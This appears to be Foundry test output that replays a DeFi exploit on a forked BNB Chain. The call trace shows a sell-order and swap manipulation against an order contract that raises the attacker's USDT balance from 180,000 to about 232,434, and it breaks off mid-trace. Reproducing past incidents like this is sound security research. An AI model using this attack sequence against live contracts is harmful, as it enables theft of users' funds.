Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-06/Will_exp.sol:25:5:
   |
25 |     IWBNB WBNB = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-06/Will_exp.sol:29:5:
   |
29 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 455.61ms (2.05ms CPU time)

Ran 1 test for src/test/2024-06/Will_exp.sol:ContractTest
[PASS] testExploit() (gas: 566881)
Logs:
  [Begin] Attacker USDT before exploit: 180000.000000000000000000
  [End] Attacker USDT after exploit: 232434.568033898910189735

Traces:
  [274534] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 39979796 [3.997e7])
    │   └─ ← [Return] 0
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::accesses(0x55d398326f99059fF775485246999027B3197955)
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000017058b35e777da275)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0x55d398326f99059fF775485246999027B3197955, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x00000000000000000000000000000000000000000000261dd1ce2f2088800000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 180000000000000000000000 [1.8e23]
    └─ ← [Stop]

  [713867] ContractTest::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 180000000000000000000000 [1.8e23]
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDT before exploit", val: 180000000000000000000000 [1.8e23], decimals: 18)
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x8687c7afa1ac13bdd7599515cfe9f9efde344c5b42f831322cf14d5877b9ec93: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [346083] 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF::placeSellOrder(71000000000000000000000 [7.1e22], 0, 0)
    │   ├─ [13634] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 71000000000000000000000 [7.1e22])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, value: 71000000000000000000000 [7.1e22])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, value: 115792089237316195423570985008687907853269984665640563968457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x8687c7afa1ac13bdd7599515cfe9f9efde344c5b42f831322cf14d5877b9ec93: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffff0f71510ce1f419fffff
    │   │   │   @ 0x80a5e16cd7a6626c482f9b77b3cef351c7968037b145aeb5cecf3d8642c6fef8: 0x000000000000000000000000000000000000000000000002321672578f32c367 → 0x000000000000000000000000000000000000000000000f0b1d05a4384d92c367
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000261dd1ce2f2088800000 → 0x000000000000000000000000000000000000000000001714e6defd3fca200000
    │   │   └─ ← [Return] true
    │   ├─ [2893] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::getReserves() [staticcall]
    │   │   └─ ← [Return] 95051792050026596068463 [9.505e22], 1082853047043822721616591 [1.082e24], 1719497760 [1.719e9]
    │   ├─ [24465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 3196542119614176432301220 [3.196e24])
    │   │   ├─ emit Approval(owner: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 3196542119614176432301220 [3.196e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3d78cd8671a4ef696e2fba85d28f7ed4e5c728e5c16abca7b7cc6f5a9b5904ef: 0 → 0x00000000000000000000000000000000000000000002a4e4e54137196b9124a4
    │   │   └─ ← [Return] true
    │   ├─ [2465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF) [staticcall]
    │   │   └─ ← [Return] 3252083773457281455646903 [3.252e24]
    │   ├─ [68178] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(3196542119614176432301220 [3.196e24], 0, [0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d, 0x55d398326f99059fF775485246999027B3197955], 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 1719498060 [1.719e9])
    │   │   ├─ [26671] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::transferFrom(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, 3196542119614176432301220 [3.196e24])
    │   │   │   ├─ emit Transfer(from: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, to: 0x719a516a38d8711477E6c47Bf70ab3bd52Cb52Ab, value: 63930842392283528646024 [6.393e22])
    │   │   │   ├─ emit Transfer(from: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, to: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, value: 3132611277221892903655196 [3.132e24])
    │   │   │   ├─ emit Approval(owner: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x80a5e16cd7a6626c482f9b77b3cef351c7968037b145aeb5cecf3d8642c6fef8: 0x00000000000000000000000000000000000000000002b0a7d08a911bfc0668b7 → 0x000000000000000000000000000000000000000000000bc2eb495a0290754413
    │   │   │   │   @ 0x3d78cd8671a4ef696e2fba85d28f7ed4e5c728e5c16abca7b7cc6f5a9b5904ef: 0x00000000000000000000000000000000000000000002a4e4e54137196b9124a4 → 0
    │   │   │   │   @ 0x33cb5cd445432f9f54dfb8443564053d68e035bd9032963bbc31a4b48e703c27: 0x00000000000000000000000000000000000000000000003621a5d190b43c222e → 0x000000000000000000000000000000000000000000000dbfd450153a2c256fb6
    │   │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x00000000000000000000000000000000000000000000e54d94d05d0736a6cacf → 0x000000000000000000000000000000000000000000037ca8c76750772a4ea1eb
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF) [staticcall]
    │   │   │   └─ ← [Return] 71040502686019193324391 [7.104e22]
    │   │   ├─ [893] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 95051792050026596068463 [9.505e22], 1082853047043822721616591 [1.082e24], 1719497760 [1.719e9]
    │   │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   └─ ← [Return] 4215464324265715625271787 [4.215e24]
    │   │   ├─ [31895] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::swap(70589789865706309844904 [7.058e22], 0, 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 0x)
    │   │   │   ├─ [8071] 0x55d398326f99059fF775485246999027B3197955::transfer(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 70589789865706309844904 [7.058e22])
    │   │   │   │   ├─ emit Transfer(from: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, to: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, value: 70589789865706309844904 [7.058e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x000000000000000000000000000000000000000000001420c499cf8575e4ec6f → 0x00000000000000000000000000000000000000000000052e1679c565a8346cc7
    │   │   │   │   │   @ 0x80a5e16cd7a6626c482f9b77b3cef351c7968037b145aeb5cecf3d8642c6fef8: 0x000000000000000000000000000000000000000000000f0b1d05a4384d92c367 → 0x000000000000000000000000000000000000000000001dfdcb25ae581b43430f
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   │   └─ ← [Return] 24462002184320286223559 [2.446e22]
    │   │   │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   │   └─ ← [Return] 4215464324265715625271787 [4.215e24]
    │   │   │   ├─ emit Sync(reserve0: 24462002184320286223559 [2.446e22], reserve1: 4215464324265715625271787 [4.215e24])
    │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 3132611277221892903655196 [3.132e24], amount0Out: 70589789865706309844904 [7.058e22], amount1Out: 0, to: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x667d742000000000e54d94d05d0736a6cacf000000001420c499cf8575e4ec6f → 0x667d7420000000037ca8c76750772a4ea1eb00000000052e1679c565a8346cc7
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF) [staticcall]
    │   │   │   └─ ← [Return] 141630292551725503169295 [1.416e23]
    │   │   └─ ← [Stop]
    │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF) [staticcall]
    │   │   └─ ← [Return] 55541653843105023345683 [5.554e22]
    │   ├─  emit topic 0: 0x3c78e727a06e65afa4117213b256b65ef0272a93d27cabb81636f7f1de534f5b
    │   │        topic 1: 0x000000000000000000000000000000000000000000000000000000000000000a
    │   │        topic 2: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │           data: 0x00000000000000000000000000000000000000000002a4e4e54137196b9124a4
    │   ├─  storage changes:
    │   │   @ 0x3d78cd8671a4ef696e2fba85d28f7ed4e5c728e5c16abca7b7cc6f5a9b5904ef: 0 → 0x00000000000000000000000000000000000000000002a4e4e54137196b9124a4
    │   │   @ 0xbbe6df1631c6a5c37158096bc15825d83d22eaca9ac1e829be6dfcdebed1d2da: 0 → 0x000000000000000000000000000000000000000000000000004ee93e2f41f322
    │   │   @ 0xbbe6df1631c6a5c37158096bc15825d83d22eaca9ac1e829be6dfcdebed1d2db: 0 → 0x0000000000000000000000017fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0xa13a7a52a9cbb6a90f40d40fbf35f68146be73226e0f48ff16963183fd5684ad: 0 → 1
    │   │   @ 0xbbe6df1631c6a5c37158096bc15825d83d22eaca9ac1e829be6dfcdebed1d2d7: 0 → 0x000000000000000000000000000000000000000000000f08eaef31e0be600000
    │   │   @ 0xbbe6df1631c6a5c37158096bc15825d83d22eaca9ac1e829be6dfcdebed1d2dc: 0 → 0x00000000000000000000000000000000000000000000000000000000667d7420
    │   │   @ 0xbbe6df1631c6a5c37158096bc15825d83d22eaca9ac1e829be6dfcdebed1d2d9: 0 → 0x00000000000000000000000000000000000000000002a4e4e54137196b9124a4
    │   │   @ 9: 10 → 11
    │   │   @ 0xbbe6df1631c6a5c37158096bc15825d83d22eaca9ac1e829be6dfcdebed1d2dd: 0 → 0x00000000000000000000000000000000000000000000000000000000667d7420
    │   │   @ 0xf4eee90d715ace4aec48912eda11282b57541920658b4d7ae87f868c6d12ce68: 0 → 10
    │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0 → 1
    │   └─ ← [Stop]
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 88000000000000000000000 [8.8e22])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 88000000000000000000000 [8.8e22])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x0000000000000000000000000000000000000000000012a27d53bc0487000000
    │   └─ ← [Return] true
    ├─ [58051] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(88000000000000000000000 [8.8e22], 0, [0x55d398326f99059fF775485246999027B3197955, 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1719497760 [1.719e9])
    │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, 88000000000000000000000 [8.8e22])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, value: 88000000000000000000000 [8.8e22])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0x0000000000000000000000000000000000000000000012a27d53bc0487000000 → 0
    │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x00000000000000000000000000000000000000000000052e1679c565a8346cc7 → 0x0000000000000000000000000000000000000000000017d093cd816a2f346cc7
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000001714e6defd3fca200000 → 0x000000000000000000000000000000000000000000000472698b413b43200000
    │   │   └─ ← [Return] true
    │   ├─ [2465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [893] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::getReserves() [staticcall]
    │   │   └─ ← [Return] 24462002184320286223559 [2.446e22], 4215464324265715625271787 [4.215e24], 1719497760 [1.719e9]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   └─ ← [Return] 112462002184320286223559 [1.124e23]
    │   ├─ [40521] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::swap(0, 3296746772000620667516326 [3.296e24], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [25497] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3296746772000620667516326 [3.296e24])
    │   │   │   ├─ emit Transfer(from: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, to: 0x719a516a38d8711477E6c47Bf70ab3bd52Cb52Ab, value: 65934935440012413350326 [6.593e22])
    │   │   │   ├─ emit Transfer(from: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3230811836560608254166000 [3.23e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x000000000000000000000000000000000000000000037ca8c76750772a4ea1eb → 0x00000000000000000000000000000000000000000000c28bc73ee2e5aba1ec45
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000002ac26a91d6123109f03f0
    │   │   │   │   @ 0x33cb5cd445432f9f54dfb8443564053d68e035bd9032963bbc31a4b48e703c27: 0x000000000000000000000000000000000000000000000dbfd450153a2c256fb6 → 0x000000000000000000000000000000000000000000001bb62b5b21a89a33216c
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   └─ ← [Return] 112462002184320286223559 [1.124e23]
    │   │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   └─ ← [Return] 918717552265094957755461 [9.187e23]
    │   │   ├─ emit Sync(reserve0: 112462002184320286223559 [1.124e23], reserve1: 918717552265094957755461 [9.187e23])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 88000000000000000000000 [8.8e22], amount1In: 0, amount0Out: 0, amount1Out: 3296746772000620667516326 [3.296e24], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x667d7420000000037ca8c76750772a4ea1eb00000000052e1679c565a8346cc7 → 0x667d742000000000c28bc73ee2e5aba1ec450000000017d093cd816a2f346cc7
    │   │   └─ ← [Stop]
    │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 3230811836560608254166000 [3.23e24]
    │   └─ ← [Stop]
    ├─ [0] VM::warp(1719497780 [1.719e9])
    │   └─ ← [Return]
    ├─ [81025] 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF::updateExpiredOrders()
    │   ├─  storage changes:
    │   │   @ 6: 0 → 0x000000000000000000000000000000000000000000001b100d48269489e00000
    │   │   @ 7: 0 → 1
    │   │   @ 0xa13a7a52a9cbb6a90f40d40fbf35f68146be73226e0f48ff16963183fd5684ad: 1 → 0
    │   └─ ← [Stop]
    ├─ [78115] 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF::settleExpiredPositions(0)
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF) [staticcall]
    │   │   └─ ← [Return] 141630292551725503169295 [1.416e23]
    │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 127800000000000000000000 [1.278e23])
    │   │   ├─ emit Approval(owner: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 127800000000000000000000 [1.278e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3d78cd8671a4ef696e2fba85d28f7ed4e5c728e5c16abca7b7cc6f5a9b5904ef: 0 → 0x000000000000000000000000000000000000000000001b100d48269489e00000
    │   │   └─ ← [Return] true
    │   ├─ [46635] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(127800000000000000000000 [1.278e23], 0, [0x55d398326f99059fF775485246999027B3197955, 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d], 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 1719498080 [1.719e9])
    │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, 127800000000000000000000 [1.278e23])
    │   │   │   ├─ emit Transfer(from: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, to: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, value: 127800000000000000000000 [1.278e23])
    │   │   │   ├─ emit Approval(owner: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3d78cd8671a4ef696e2fba85d28f7ed4e5c728e5c16abca7b7cc6f5a9b5904ef: 0x000000000000000000000000000000000000000000001b100d48269489e00000 → 0
    │   │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x0000000000000000000000000000000000000000000017d093cd816a2f346cc7 → 0x0000000000000000000000000000000000000000000032e0a115a7feb9146cc7
    │   │   │   │   @ 0x80a5e16cd7a6626c482f9b77b3cef351c7968037b145aeb5cecf3d8642c6fef8: 0x000000000000000000000000000000000000000000001dfdcb25ae581b43430f → 0x0000000000000000000000000000000000000000000002edbddd87c39163430f
    │   │   │   └─ ← [Return] true
    │   │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF) [staticcall]
    │   │   │   └─ ← [Return] 55541653843105023345683 [5.554e22]
    │   │   ├─ [893] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 112462002184320286223559 [1.124e23], 918717552265094957755461 [9.187e23], 1719497760 [1.719e9]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   └─ ← [Return] 240262002184320286223559 [2.402e23]
    │   │   ├─ [31105] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::swap(0, 488110992655905871511429 [4.881e23], 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 0x)
    │   │   │   ├─ [5597] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::transfer(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, 488110992655905871511429 [4.881e23])
    │   │   │   │   ├─ emit Transfer(from: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, to: 0x719a516a38d8711477E6c47Bf70ab3bd52Cb52Ab, value: 9762219853118117430228 [9.762e21])
